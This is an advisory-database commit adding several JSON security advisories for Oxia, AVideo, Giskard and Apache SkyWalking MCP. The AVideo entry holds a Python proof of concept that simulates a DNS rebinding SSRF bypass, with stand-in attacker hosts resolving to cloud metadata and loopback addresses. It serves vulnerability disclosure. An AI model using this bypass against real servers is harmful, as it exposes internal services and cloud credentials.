Publish Advisories

GHSA-5gqc-qhrj-9xw8
GHSA-793q-xgj6-7frp
GHSA-7jrq-q4pq-rhm6
GHSA-7xjm-g8f4-rp26
GHSA-c4hg-6933-x62x
GHSA-fhvp-9hcj-6m33
GHSA-pm7q-rjjx-979p

Author: advisory-database[bot]

advisories/github-reviewed/2026/04/GHSA-5gqc-qhrj-9xw8/GHSA-5gqc-qhrj-9xw8.json

@@ -0,0 +1,58 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-5gqc-qhrj-9xw8",
+  "modified": "2026-04-14T23:15:00Z",
+  "published": "2026-04-14T23:15:00Z",
+  "aliases": [],
+  "summary": "Oxia affected by server crash via race condition in session heartbeat handling",
+  "details": "### Summary\nA race condition between session heartbeat processing and session closure can cause the server to panic with `send on closed channel`. The `heartbeat()` method uses a blocking channel send while holding a mutex, and under specific timing with concurrent `close()` calls, this can lead to either a deadlock (channel buffer full) or a panic (send on closed channel after TOCTOU gap in `KeepAlive`).\n\n### Impact\nA remote client can trigger a server crash by sending rapid `KeepAlive` requests while a session is expiring or being closed. This is a denial-of-service vulnerability that crashes the entire data server process.\n\nAll versions are affected.\n\n### Details\nIn `oxiad/dataserver/controller/lead/session.go`, the `heartbeat()` method performs a blocking `s.heartbeatCh <- true` send. If the channel buffer is full (size 1), this blocks while holding the session mutex, preventing `close()` from acquiring the lock to close the channel — a deadlock.\n\nAdditionally, in `session_manager.go`, `KeepAlive()` releases the session manager's read lock before calling `heartbeat()`, creating a TOCTOU window where the session can be removed and closed between the lookup and the heartbeat call.\n\n### Patches\nFixed by changing `heartbeat()` to use a non-blocking `select` with a `default` case, and by holding the session manager read lock through the entire `KeepAlive()` operation.\n\n### Workarounds\nNo workaround available.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:N/VI:N/VA:H/SC:N/SI:N/SA:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/oxia-db/oxia"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.16.2"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 0.16.1"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/oxia-db/oxia/security/advisories/GHSA-5gqc-qhrj-9xw8"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/oxia-db/oxia"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-362"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-14T23:15:00Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/04/GHSA-793q-xgj6-7frp/GHSA-793q-xgj6-7frp.json

@@ -0,0 +1,63 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-793q-xgj6-7frp",
+  "modified": "2026-04-14T23:15:43Z",
+  "published": "2026-04-14T23:15:43Z",
+  "aliases": [],
+  "summary": "WWBN AVideo has an incomplete fix for CVE-2026-33039: SSRF",
+  "details": "### Summary\n\nThe incomplete SSRF fix in AVideo's LiveLinks proxy adds `isSSRFSafeURL()` validation but leaves DNS TOCTOU vulnerabilities where DNS rebinding between validation and the actual HTTP request redirects traffic to internal endpoints.\n\n### Affected Package\n\n- **Ecosystem:** Other\n- **Package:** AVideo\n- **Affected versions:** < commit 0e56382921fc71e64829cd1ec35f04e338c70917\n- **Patched versions:** >= commit 0e56382921fc71e64829cd1ec35f04e338c70917\n\n### Details\n\nThe `plugin/LiveLinks/proxy.php` endpoint proxies live stream URLs. The fix adds `isSSRFSafeURL()` check on the initial URL, redirect URL validation, and `follow_location=0` in the `get_headers()` context. However, multiple DNS TOCTOU vulnerabilities remain.\n\nFor the initial URL, `isSSRFSafeURL()` resolves DNS once for validation, but `get_headers()` resolves DNS again independently. A DNS rebinding attack with TTL=0 returns a safe external IP for the first resolution and an internal IP for the second.\n\nThe same TOCTOU exists for redirect URLs: `isSSRFSafeURL()` validates the redirect target (first resolution returns a safe IP), then `fakeBrowser()` makes the actual request (second resolution returns an internal IP).\n\nAdditionally, even with `follow_location=0`, `get_headers()` still sends an HTTP request that can probe internal services via DNS rebinding, and multiple `Location` headers in a response cause `filter_var()` to receive an array instead of a string, resulting in a fall-through to the else branch.\n\n### PoC\n\n```python\n#!/usr/bin/env python3\n\"\"\"\nCVE-2026-33039 - AVideo LiveLinks Proxy SSRF via DNS Rebinding\n\"\"\"\n\nimport re\nimport sys\n\nclass DNSResolver:\n    def __init__(self):\n        self._call_count = {}\n\n    def resolve(self, host):\n        if host not in self._call_count:\n            self._call_count[host] = 0\n        self._call_count[host] += 1\n\n        if host == \"rebind.attacker.com\":\n            return \"93.184.216.34\" if self._call_count[host] == 1 else \"169.254.169.254\"\n        if host == \"rebind-loopback.attacker.com\":\n            return \"93.184.216.34\" if self._call_count[host] == 1 else \"127.0.0.1\"\n\n        static = {\"attacker.com\": \"93.184.216.34\", \"example.com\": \"93.184.216.34\", \"localhost\": \"127.0.0.1\"}\n        return static.get(host, None)\n\n    def reset(self):\n        self._call_count = {}\n\ndns = DNSResolver()\n\ndef php_parse_url_host(url):\n    match = re.match(r'https?://([^/:?#]+)', url, re.IGNORECASE)\n    return match.group(1).lower() if match else None\n\ndef php_filter_validate_ip(s):\n    if re.match(r'^\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}\\.\\d{1,3}$', s):\n        return all(0 <= int(p) <= 255 for p in s.split('.'))\n    return False\n\ndef is_ssrf_safe_url(url):\n    if not url: return False, \"empty\"\n    host = php_parse_url_host(url)\n    if not host: return False, \"no host\"\n\n    for pat in ['localhost', '127.0.0.1', '::1', '0.0.0.0']:\n        if host == pat: return False, f\"blocked: {host}\"\n\n    ip = host\n    if not php_filter_validate_ip(host):\n        resolved = dns.resolve(host)\n        if not resolved: return False, \"DNS failed\"\n        ip = resolved\n\n    for pattern in [r'^10\\.', r'^172\\.(1[6-9]|2\\d|3[0-1])\\.', r'^192\\.168\\.', r'^127\\.', r'^169\\.254\\.']:\n        if re.match(pattern, ip): return False, f\"blocked: {ip}\"\n\n    return True, f\"allowed ({ip})\"\n\ndef main():\n    print(\"=\" * 72)\n    print(\"CVE-2026-33039 - AVideo LiveLinks Proxy SSRF PoC\")\n    print(\"=\" * 72)\n\n    vuln_count = 0\n\n    print(\"\\n[TEST 1] DNS rebinding on initial URL\")\n    dns.reset()\n    safe, reason = is_ssrf_safe_url(\"http://rebind.attacker.com/meta-data/\")\n    actual_ip = dns.resolve(\"rebind.attacker.com\")\n    print(f\"  isSSRFSafeURL: safe={safe}, reason={reason}\")\n    print(f\"  Actual request goes to: {actual_ip}\")\n    if safe and actual_ip == \"169.254.169.254\":\n        print(\"  => BYPASS!\")\n        vuln_count += 1\n\n    print(\"\\n[TEST 2] DNS rebinding on redirect URL\")\n    dns.reset()\n    safe_r, _ = is_ssrf_safe_url(\"http://rebind-loopback.attacker.com/admin/\")\n    final_ip = dns.resolve(\"rebind-loopback.attacker.com\")\n    print(f\"  isSSRFSafeURL: safe={safe_r}\")\n    print(f\"  fakeBrowser() goes to: {final_ip}\")\n    if safe_r and final_ip == \"127.0.0.1\":\n        print(\"  => BYPASS!\")\n        vuln_count += 1\n\n    print(\"\\n[TEST 3] get_headers() side-effect\")\n    dns.reset()\n    safe, _ = is_ssrf_safe_url(\"http://rebind.attacker.com:8080/probe\")\n    side_ip = dns.resolve(\"rebind.attacker.com\")\n    print(f\"  isSSRFSafeURL passed: {safe}\")\n    print(f\"  get_headers() reached: {side_ip}\")\n    if safe and side_ip == \"169.254.169.254\":\n        print(\"  => BYPASS!\")\n        vuln_count += 1\n\n    print(f\"\\nBypass vectors: {vuln_count}\")\n    if vuln_count > 0:\n        print(\"\\nVULNERABILITY CONFIRMED\")\n        return 0\n    return 1\n\nif __name__ == \"__main__\":\n    sys.exit(main())\n```\n\n**Steps to reproduce:**\n1. Run `python3 poc.py`.\n2. Observe that all three DNS rebinding bypass vectors succeed.\n\n**Expected output:**\n```\nVULNERABILITY CONFIRMED\nDNS TOCTOU bypass vectors succeed on initial URL, redirect URL, and get_headers() side-effect paths.\n```\n\n### Impact\n\nDNS rebinding allows an attacker to bypass SSRF validation and make the server send requests to internal services, cloud metadata endpoints, and other protected resources.\n\n### Suggested Remediation\n\nPin DNS resolution: resolve the hostname once, validate the IP, and use the resolved IP for the actual request via `CURLOPT_RESOLVE` or equivalent. Remove the `get_headers()` call. Block redirects entirely or re-validate using pinned DNS after each redirect.",
+  "severity": [
+    {
+      "type": "CVSS_V3",
+      "score": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:L/I:N/A:N"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Packagist",
+        "name": "wwbn/avideo"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "last_affected": "29.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/WWBN/AVideo/security/advisories/GHSA-793q-xgj6-7frp"
+    },
+    {
+      "type": "ADVISORY",
+      "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-33039"
+    },
+    {
+      "type": "WEB",
+      "url": "https://github.com/WWBN/AVideo/commit/0e56382921fc71e64829cd1ec35f04e338c70917"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/WWBN/AVideo"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-918"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-14T23:15:43Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/04/GHSA-7jrq-q4pq-rhm6/GHSA-7jrq-q4pq-rhm6.json

@@ -0,0 +1,58 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-7jrq-q4pq-rhm6",
+  "modified": "2026-04-14T23:15:16Z",
+  "published": "2026-04-14T23:15:16Z",
+  "aliases": [],
+  "summary": "Oxia's TLS CA certificate chain validation fails with multi-certificate PEM bundles",
+  "details": "### Summary\nThe `trustedCertPool()` function in the TLS configuration only parses the first PEM block from CA certificate files. When a CA bundle contains multiple certificates (e.g., intermediate + root CA), only the first certificate is loaded. This silently breaks certificate chain validation for mTLS.\n\n### Impact\nIn deployments using mTLS with certificate chains (intermediate CA + root CA bundles), legitimate clients with properly chained certificates are rejected with `x509: certificate signed by unknown authority`. This degrades the security posture by making mTLS unusable with standard CA chain configurations, potentially forcing operators to disable client certificate verification.\n\nAll versions using TLS with `trustedCaFile` configuration are affected.\n\n### Details\nIn `common/security/tls.go`, the `trustedCertPool()` method calls `pem.Decode()` only once, processing a single PEM block. The remaining bytes (containing additional certificates) are silently discarded. Additionally, the error return from `pem.Decode` is ignored, so a corrupted CA file results in an empty certificate pool without any error.\n\n### Patches\nFixed by iterating over all PEM blocks in the file, parsing each CERTIFICATE block, and returning an error if no valid certificates are found.\n\n### Workarounds\nUse CA files containing only a single certificate (the direct issuer of client certificates, not a chain).",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:H/VI:H/VA:N/SC:N/SI:N/SA:N/E:U"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/oxia-db/oxia"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.16.2"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 0.16.1"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/oxia-db/oxia/security/advisories/GHSA-7jrq-q4pq-rhm6"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/oxia-db/oxia"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-295"
+    ],
+    "severity": "HIGH",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-14T23:15:16Z",
+    "nvd_published_at": null
+  }
+}

advisories/github-reviewed/2026/04/GHSA-7xjm-g8f4-rp26/GHSA-7xjm-g8f4-rp26.json

@@ -0,0 +1,60 @@
+{
+  "schema_version": "1.4.0",
+  "id": "GHSA-7xjm-g8f4-rp26",
+  "modified": "2026-04-14T23:13:52Z",
+  "published": "2026-04-14T23:13:52Z",
+  "aliases": [
+    "CVE-2026-40320"
+  ],
+  "summary": "Giskard has Unsandboxed Jinja2 Template Rendering in ConformityCheck",
+  "details": "## Summary\n \nThe `ConformityCheck` class in `giskard-checks` rendered the `rule` parameter through Jinja2's default `Template()` constructor. Because the `rule` string is silently interpreted as a Jinja2 template, a developer may not realize that template expressions embedded in rule definitions are evaluated at runtime. In a scenario where check definitions are loaded from an untrusted source (e.g. a shared project file or externally contributed configuration), this could lead to arbitrary code execution.\n\n`giskard-checks` is a local developer testing library with no network-facing service. Check definitions, including the `rule` parameter, are provided in application code or project configuration files and executed locally. Exploitation requires write access to a check definition and subsequent execution of the test suite by a developer.\n\nHowever, the implicit template evaluation of the `rule` parameter is not obvious from the API surface. This hidden behavior increases the likelihood of a developer inadvertently passing untrusted input to it when integrating the library into a larger system. \n\n## Affected Component\n \n`conformity.py`, line 59:\n```python\nfrom jinja2 import Template\n...\nformatted_rule = Template(self.rule).render(trace=trace)\n```\n \n## Affected Versions\n \n`giskard-checks` < 1.0.2b1\n \n## Patched Version\n \n`giskard-checks` >= **1.0.2b1** (template parsing removed from rule evaluation entirely)\n \n## Remediation\n \nUpgrade to `giskard-checks` >= 1.0.2b1. The template rendering has been removed from rule evaluation.\n \n## Credit\n \nGiskard-AI thanks @dhabaleshwar for identifying the unsandboxed template usage.",
+  "severity": [
+    {
+      "type": "CVSS_V4",
+      "score": "CVSS:4.0/AV:L/AC:L/AT:P/PR:L/UI:P/VC:H/VI:H/VA:H/SC:N/SI:N/SA:L"
+    }
+  ],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "PyPI",
+        "name": "giskard-checks"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "1.0.2b1"
+            }
+          ]
+        }
+      ],
+      "database_specific": {
+        "last_known_affected_version_range": "<= 1.0.1b1"
+      }
+    }
+  ],
+  "references": [
+    {
+      "type": "WEB",
+      "url": "https://github.com/Giskard-AI/giskard-oss/security/advisories/GHSA-7xjm-g8f4-rp26"
+    },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/Giskard-AI/giskard-oss"
+    }
+  ],
+  "database_specific": {
+    "cwe_ids": [
+      "CWE-1336"
+    ],
+    "severity": "MODERATE",
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-14T23:13:52Z",
+    "nvd_published_at": null
+  }
+}

…-c4hg-6933-x62x/GHSA-c4hg-6933-x62x.json …-c4hg-6933-x62x/GHSA-c4hg-6933-x62x.jsonadvisories/unreviewed/2026/04/GHSA-c4hg-6933-x62x/GHSA-c4hg-6933-x62x.json renamed to advisories/github-reviewed/2026/04/GHSA-c4hg-6933-x62x/GHSA-c4hg-6933-x62x.json advisories/unreviewed/2026/04/GHSA-c4hg-6933-x62x/GHSA-c4hg-6933-x62x.json renamed to advisories/github-reviewed/2026/04/GHSA-c4hg-6933-x62x/GHSA-c4hg-6933-x62x.json

@@ -1,24 +1,49 @@
 {
   "schema_version": "1.4.0",
   "id": "GHSA-c4hg-6933-x62x",
-  "modified": "2026-04-13T18:30:40Z",
+  "modified": "2026-04-14T23:16:30Z",
   "published": "2026-04-13T15:31:41Z",
   "aliases": [
     "CVE-2026-34476"
   ],
+  "summary": "Apache SkyWalking MCP: Server-Side Request Forgery via SW-URL Header in MCP Server",
   "details": "Server-Side Request Forgery via SW-URL Header vulnerability in Apache SkyWalking MCP.\n\nThis issue affects Apache SkyWalking MCP: 0.1.0.\n\nUsers are recommended to upgrade to version 0.2.0, which fixes this issue.",
   "severity": [
     {
       "type": "CVSS_V3",
       "score": "CVSS:3.1/AV:N/AC:L/PR:L/UI:N/S:U/C:H/I:L/A:N"
     }
   ],
-  "affected": [],
+  "affected": [
+    {
+      "package": {
+        "ecosystem": "Go",
+        "name": "github.com/apache/skywalking-mcp"
+      },
+      "ranges": [
+        {
+          "type": "ECOSYSTEM",
+          "events": [
+            {
+              "introduced": "0"
+            },
+            {
+              "fixed": "0.2.0"
+            }
+          ]
+        }
+      ]
+    }
+  ],
   "references": [
     {
       "type": "ADVISORY",
       "url": "https://nvd.nist.gov/vuln/detail/CVE-2026-34476"
     },
+    {
+      "type": "PACKAGE",
+      "url": "https://github.com/apache/skywalking-mcp"
+    },
     {
       "type": "WEB",
       "url": "https://lists.apache.org/thread/v0k1xyzzbtnpyrwxwyn36pbspr8rhjnr"
@@ -33,8 +58,8 @@
       "CWE-918"
     ],
     "severity": "HIGH",
-    "github_reviewed": false,
-    "github_reviewed_at": null,
+    "github_reviewed": true,
+    "github_reviewed_at": "2026-04-14T23:16:30Z",
     "nvd_published_at": "2026-04-13T13:16:40Z"
   }
 }